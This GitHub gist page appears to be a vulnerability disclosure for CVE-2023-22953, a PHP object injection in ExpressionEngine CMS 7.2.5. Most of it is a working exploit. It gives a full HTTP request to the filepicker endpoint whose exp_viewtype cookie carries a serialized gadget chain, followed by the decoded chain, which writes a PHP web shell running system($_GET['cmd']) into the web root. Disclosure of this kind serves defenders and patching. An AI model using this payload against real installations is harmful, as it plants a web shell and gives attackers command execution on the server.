Skip to content

Instantly share code, notes, and snippets.

@ahmedsherif

ahmedsherif/CVE-2023-22953.md

Created March 2, 2023 12:58
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ahmedsherif/7b8f18a54a80ae0ac5ff6307c35b7d43 to your computer and use it in GitHub Desktop.
Save ahmedsherif/7b8f18a54a80ae0ac5ff6307c35b7d43 to your computer and use it in GitHub Desktop.
Download ZIP
Publications of CVE-2023-22953. PHP Object Injection with custom gadget chain
Raw
CVE-2023-22953.md

-CVE ID: CVE-2023-22953

- Vulnerable version: 7.2.5

-Vulnerable software: ExpressionEngine CMS

-Link: https://expressionengine.com/

-Authors: Ahmed Sherif (@sherif_ninja) and Abood Nour (@AboodNour)

Description

Arbitrary command execution by exploiting an object injection vulnerability. The affected endpoint is /cp/addons/settings/filepicker and can be exploited by sending a serialized malicious object in the exp_viewtype cookie. The Adapter class can be used to build a gadget chain and write PHP files into the default app directory.

impact

An authenticated user can exploit the PHP Object Injection and gain command execution on the underlying operating system.

Exploit

GET /admin.php?/cp/addons/settings/filepicker HTTP/1.1
Host: localhost:30001
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Purpose: prefetch
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: exp_last_visit=1671913623; exp_last_activity=1671968630; exp_viewtype=a%3A2%3A%7Bi%3A1337%3BO%3A67%3A%22ExpressionEngine%5C%5CDependency%5C%5CLeague%5C%5CFlysystem%5C%5CCached%5C%5CStorage%5C%5CAdapter%22%3A4%3A%7Bs%3A7%3A%22adapter%22%3BO%3A58%3A%22ExpressionEngine%5C%5CDependency%5C%5CLeague%5C%5CFlysystem%5C%5CAdapter%5C%5CLocal%22%3A4%3A%7Bs%3A10%3A%22rootExists%22%3Bb%3A0%3Bs%3A13%3A%22pathSeparator%22%3Bs%3A1%3A%22%2F%22%3Bs%3A10%3A%22writeFlags%22%3Bi%3A0%3Bs%3A10%3A%22pathPrefix%22%3Bs%3A32%3A%22%2Fvar%2Fwww%2Fhtml%2Fimages%2Ftesting.php%22%3B%7Ds%3A8%3A%22autosave%22%3Bb%3A0%3Bs%3A4%3A%22file%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22expire%22%3Bs%3A34%3A%22%3C%3Fphp+echo+system%28%24_GET%5B%27cmd%27%5D%29%3B%3F%3E%22%3B%7Di%3A1337%3Bs%3A5%3A%227knbh%22%3B%7D%; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%223f92644cb590bcfc68dab723c0211297faea6108e6c788b23da23ff45100808e41675301e75d960c6ac60df9021f5acc%22%7D; exp_csrf_token=fe3239026bae4959dfe79f2701e87d181d9d4a07; exp_sessionid=2684f59ade507f3ee6f45f6eef4eeff6edd686d8
Connection: close

Gadget chain:

a:2:{i:1337;O:67:"ExpressionEngine\\Dependency\\League\\Flysystem\\Cached\\Storage\\Adapter":4:{s:7:"adapter";O:58:"ExpressionEngine\\Dependency\\League\\Flysystem\\Adapter\\Local":4:{s:10:"rootExists";b:0;s:13:"pathSeparator";s:1:"/";s:10:"writeFlags";i:0;s:10:"pathPrefix";s:29:"/var/www/html/images/file.php";}s:8:"autosave";b:0;s:4:"file";s:0:"";s:6:"expire";s:34:"<?php echo system($_GET['cmd']);?>";}i:1337;s:5:"7knbh";}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment